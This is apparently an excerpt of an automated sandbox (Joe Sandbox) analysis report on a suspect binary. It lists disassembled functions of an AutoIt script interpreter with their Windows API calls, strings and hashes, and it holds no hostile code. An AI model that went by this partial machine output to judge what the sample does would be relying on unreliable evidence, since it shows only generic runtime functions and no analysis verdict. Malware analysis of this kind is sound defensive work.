                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                            • API String ID: 3974292440-719923060
                                                                            • Opcode ID: d07580c7267d2aab08666c30939ffb97390698001ba47c68356139b15df30259
                                                                            • Instruction ID: 00157b60decca8d5c28c380a0271cbff0719e4b19df11acc65562d4b8c255963
                                                                            • Opcode Fuzzy Hash: d07580c7267d2aab08666c30939ffb97390698001ba47c68356139b15df30259
                                                                            • Instruction Fuzzy Hash: FDA1A3342043429FCB1AEF10C952AAAB3A5BF48354F10896DF9969F7D6DB31EC05CB81
                                                                            Function 0033CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0033CF91
                                                                            • __swprintf.LIBCMT ref: 0033D032
                                                                            • _wcscmp.LIBCMT ref: 0033D045
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0033D09A
                                                                            • _wcscmp.LIBCMT ref: 0033D0D6
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0033D10D
                                                                            • GetDlgCtrlID.USER32(?), ref: 0033D15F
                                                                            • GetWindowRect.USER32(?,?), ref: 0033D195
                                                                            • GetParent.USER32(?), ref: 0033D1B3
                                                                            • ScreenToClient.USER32(00000000), ref: 0033D1BA
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 0033D234
                                                                            • _wcscmp.LIBCMT ref: 0033D248
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0033D26E
                                                                            • _wcscmp.LIBCMT ref: 0033D282
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                            • String ID: %s%u
                                                                            • API String ID: 3119225716-679674701
                                                                            • Opcode ID: 837437c066fa959f2687f3303cff82c8183dcd5dbbc1742b105725d6f7a694bb
                                                                            • Instruction ID: 383ca6d9d52995a8f52c7c7c4c208041cb4496f345900cb6366ab6076411a076
                                                                            • Opcode Fuzzy Hash: 837437c066fa959f2687f3303cff82c8183dcd5dbbc1742b105725d6f7a694bb
                                                                            • Instruction Fuzzy Hash: E2A1CE71604306AFD716DF64E8C4FAAB7A8FF44314F008A29F999D7190EB30EA45CB91
                                                                            Function 0033D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 0033D8EB
                                                                            • _wcscmp.LIBCMT ref: 0033D8FC
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 0033D924
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 0033D941
                                                                            • _wcscmp.LIBCMT ref: 0033D95F
                                                                            • _wcsstr.LIBCMT ref: 0033D970
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0033D9A8
                                                                            • _wcscmp.LIBCMT ref: 0033D9B8
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 0033D9DF
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 0033DA28
                                                                            • _wcscmp.LIBCMT ref: 0033DA38
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 0033DA60
                                                                            • GetWindowRect.USER32(00000004,?), ref: 0033DAC9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 7447e26b291e81f4870077056feee060eccab2fa4cd35d50c0be802a1f75b10f
                                                                            • Instruction ID: d981159e83e6a697ffe27c9e552ec0e053d4b76423c65d0cdcee5a0c2b3e9306
                                                                            • Opcode Fuzzy Hash: 7447e26b291e81f4870077056feee060eccab2fa4cd35d50c0be802a1f75b10f
                                                                            • Instruction Fuzzy Hash: B781C3710083059BDB06DF10E9C5FAA7BE8FF84714F0584A9FD8A9A096DB30DD45CBA1
                                                                            Function 0033D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 1038674560-1810252412
                                                                            • Opcode ID: 14a1944bd7c006da75a59ba308fdab9023a37ca97570166db1e163e21db11d1b
                                                                            • Instruction ID: f389591748a865e2d7684954a3963432dfd1b6f6f66305360daaa913a33abf5e
                                                                            • Opcode Fuzzy Hash: 14a1944bd7c006da75a59ba308fdab9023a37ca97570166db1e163e21db11d1b
                                                                            • Instruction Fuzzy Hash: 87318D71644305AADB1BFF60EEA3EEEB3A89F20704F200229F541794D5EF61AE14C655
                                                                            Function 0033EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(00000063), ref: 0033EAB0
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0033EAC2
                                                                            • SetWindowTextW.USER32(?,?), ref: 0033EAD9
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0033EAEE
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0033EAF4
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0033EB04
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0033EB0A
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0033EB2B
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0033EB45
                                                                            • GetWindowRect.USER32(?,?), ref: 0033EB4E
                                                                            • SetWindowTextW.USER32(?,?), ref: 0033EBB9
                                                                            • GetDesktopWindow.USER32 ref: 0033EBBF
                                                                            • GetWindowRect.USER32(00000000), ref: 0033EBC6
                                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0033EC12
                                                                            • GetClientRect.USER32(?,?), ref: 0033EC1F
                                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0033EC44
                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0033EC6F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: f8430cc37e69caf297bb30d57cf0331e96a8b339808079d012c4530bdebbc7e7
                                                                            • Instruction ID: d85b95823d56d9c89443252b0906cd67946628ec955bfac16d805ab926693c7a
                                                                            • Opcode Fuzzy Hash: f8430cc37e69caf297bb30d57cf0331e96a8b339808079d012c4530bdebbc7e7
                                                                            • Instruction Fuzzy Hash: 62513D71900709AFDB229FA8DD89F6EBBF9FF04705F014918E686A65E0D774A944CB10
                                                                            Function 003579B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 003579C6
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 003579D1
                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 003579DC
                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 003579E7
                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 003579F2
                                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 003579FD
                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00357A08
                                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00357A13
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00357A1E
                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00357A29
                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00357A34
                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00357A3F
                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00357A4A
                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00357A55
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00357A60
                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00357A6B
                                                                            • GetCursorInfo.USER32(?), ref: 00357A7B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 04c76a6ab4c3680a74a1eda09e9ce9d704e4800364af95f045c33fa5fcfe482d
                                                                            • Instruction ID: 2ca10c494a562a2daf5394f46926b6fbebf542b2171fadde68353cb948bdfc66
                                                                            • Opcode Fuzzy Hash: 04c76a6ab4c3680a74a1eda09e9ce9d704e4800364af95f045c33fa5fcfe482d
                                                                            • Instruction Fuzzy Hash: 4E3127B0D0831A6ADB119FB69C89D9FBFECFF04750F50452AE50DE7280DA78A5048FA1
                                                                            Function 0030C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0030C8B7,?,00002000,?,?,00000000,?,0030419E,?,?,?,0039DC00), ref: 0031E984
                                                                              • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
                                                                            • __wsplitpath.LIBCMT ref: 0030C93E
                                                                              • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
                                                                            • _wcscpy.LIBCMT ref: 0030C953
                                                                            • _wcscat.LIBCMT ref: 0030C968
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0030C978
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0030CABE
                                                                              • Part of subcall function 0030B337: _wcscpy.LIBCMT ref: 0030B36F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 2258743419-1018226102
                                                                            • Opcode ID: 64b6e4f3b907f48b3032777fbc24f6aae141181d61f1ddd8f58d9ca1f7e31dc8
                                                                            • Instruction ID: ff6eb2d7f52120b1708828e21fbe6edd2d2ac9b95fc8075ae816113cb0c23427
                                                                            • Opcode Fuzzy Hash: 64b6e4f3b907f48b3032777fbc24f6aae141181d61f1ddd8f58d9ca1f7e31dc8
                                                                            • Instruction Fuzzy Hash: 4312D3715093419FC726EF24C891AAFBBE8FF89300F40491EF5899B291DB30DA49DB52
                                                                            Function 0036CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0036CEFB
                                                                            • DestroyWindow.USER32(?,?), ref: 0036CF73
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0036CFF4
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0036D016
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036D025
                                                                            • DestroyWindow.USER32(?), ref: 0036D042
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00300000,00000000), ref: 0036D075
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036D094
                                                                            • GetDesktopWindow.USER32 ref: 0036D0A9
                                                                            • GetWindowRect.USER32(00000000), ref: 0036D0B0
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0036D0C2
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0036D0DA
                                                                              • Part of subcall function 0031B526: GetWindowLongW.USER32(?,000000EB), ref: 0031B537
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 3877571568-3619404913
                                                                            • Opcode ID: ddd9fabbb3819ccacf03709c92390e598849118e748cd31295f429407d850816
                                                                            • Instruction ID: c9e67ee1021d9136b99e02a0abf5803478c802fbfa2df3fb939bdb8b7344cb65
                                                                            • Opcode Fuzzy Hash: ddd9fabbb3819ccacf03709c92390e598849118e748cd31295f429407d850816
                                                                            • Instruction Fuzzy Hash: 8B71E0B0640305AFD722CF28CC85FA677E9FB89708F04851DF9858B2A1D730E842DB22
                                                                            Function 0036F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0036F37A
                                                                              • Part of subcall function 0036D7DE: ClientToScreen.USER32(?,?), ref: 0036D807
                                                                              • Part of subcall function 0036D7DE: GetWindowRect.USER32(?,?), ref: 0036D87D
                                                                              • Part of subcall function 0036D7DE: PtInRect.USER32(?,?,0036ED5A), ref: 0036D88D
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0036F3E3
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0036F3EE
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0036F411
                                                                            • _wcscat.LIBCMT ref: 0036F441
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0036F458
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0036F471
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0036F488
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0036F4AA
                                                                            • DragFinish.SHELL32(?), ref: 0036F4B1
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0036F59C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 169749273-3440237614
                                                                            • Opcode ID: e32dd89b96e9ad6ecd48273437d4e4e6e38791a299931edc9e9b6a26e2494e58
                                                                            • Instruction ID: a91c06b7aa9770d5615a576a753a1d82d8d21e36a09ddebc958a747b743faa5c
                                                                            • Opcode Fuzzy Hash: e32dd89b96e9ad6ecd48273437d4e4e6e38791a299931edc9e9b6a26e2494e58
                                                                            • Instruction Fuzzy Hash: 07614871108304AFC302EF64DC85E9BBBE8EF89714F404A1EF695961A1DB71AA19CB52
                                                                            Function 0034AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0034AB3D
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0034AB46
                                                                            • VariantClear.OLEAUT32(?), ref: 0034AB52
                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0034AC40
                                                                            • __swprintf.LIBCMT ref: 0034AC70
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 0034AC9C
                                                                            • VariantInit.OLEAUT32(?), ref: 0034AD4D
                                                                            • SysFreeString.OLEAUT32(00000016), ref: 0034ADDF
                                                                            • VariantClear.OLEAUT32(?), ref: 0034AE35
                                                                            • VariantClear.OLEAUT32(?), ref: 0034AE44
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0034AE80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 3730832054-3931177956
                                                                            • Opcode ID: e181e07c9ed35c72f96e5b6ed08c1874ad0d269615ae87fdbdb61da474073b32
                                                                            • Instruction ID: 9a0c4653f452bb8fb21a7982f7dae60f53e6d95d4b0fdc46191019128f04aaf6
                                                                            • Opcode Fuzzy Hash: e181e07c9ed35c72f96e5b6ed08c1874ad0d269615ae87fdbdb61da474073b32
                                                                            • Instruction Fuzzy Hash: 78D1EA31A40A15EBDF269F65D885BAAB7F9FF08700F148455E4059F6A1CB34BC80DBA3
                                                                            Function 0036716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 003671FC
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00367247
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: 98e76228bd1aba08c8178ea7b7eb5ae9c2df14c7a9e28b1023db5c71f7ec57d8
                                                                            • Instruction ID: ef48f51fb69c77790a1a179ca89860bf799e8d0db0adba2f35a5e9a238e9b6ba
                                                                            • Opcode Fuzzy Hash: 98e76228bd1aba08c8178ea7b7eb5ae9c2df14c7a9e28b1023db5c71f7ec57d8
                                                                            • Instruction Fuzzy Hash: 169171342047019BCB07EF10C851AAEB7A5AF98314F508859FD966F7A7DB31ED4ACB81
                                                                            Function 0033CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,0033CF50), ref: 0033CE90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: 4+;$CLASS$CLASSNN$H+;$INSTANCE$L+;$NAME$P+;$REGEXPCLASS$T+;$TEXT
                                                                            • API String ID: 3555792229-1971344045
                                                                            • Opcode ID: 6ad3862b2714de4c842e57d66406c8055345cc0fc8e66e6e394c4752313e9cc1
                                                                            • Instruction ID: 41fef8279d018fd5515ce0d75dc1892bbb2cc591a8e4153ba05cc957f95e2fe5
                                                                            • Opcode Fuzzy Hash: 6ad3862b2714de4c842e57d66406c8055345cc0fc8e66e6e394c4752313e9cc1
                                                                            • Instruction Fuzzy Hash: 9591A370610606ABCB1AEF60C8D1BEEFB75BF04304F509519E959BB191DF30699ACBD0
                                                                            Function 0036E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0036E5AB
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0036BEAF), ref: 0036E607
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E647
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E68C
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E6C3
                                                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0036BEAF), ref: 0036E6CF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0036E6DF
                                                                            • DestroyIcon.USER32(?,?,?,?,?,0036BEAF), ref: 0036E6EE
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0036E70B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0036E717
                                                                              • Part of subcall function 00320FA7: __wcsicmp_l.LIBCMT ref: 00321030
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
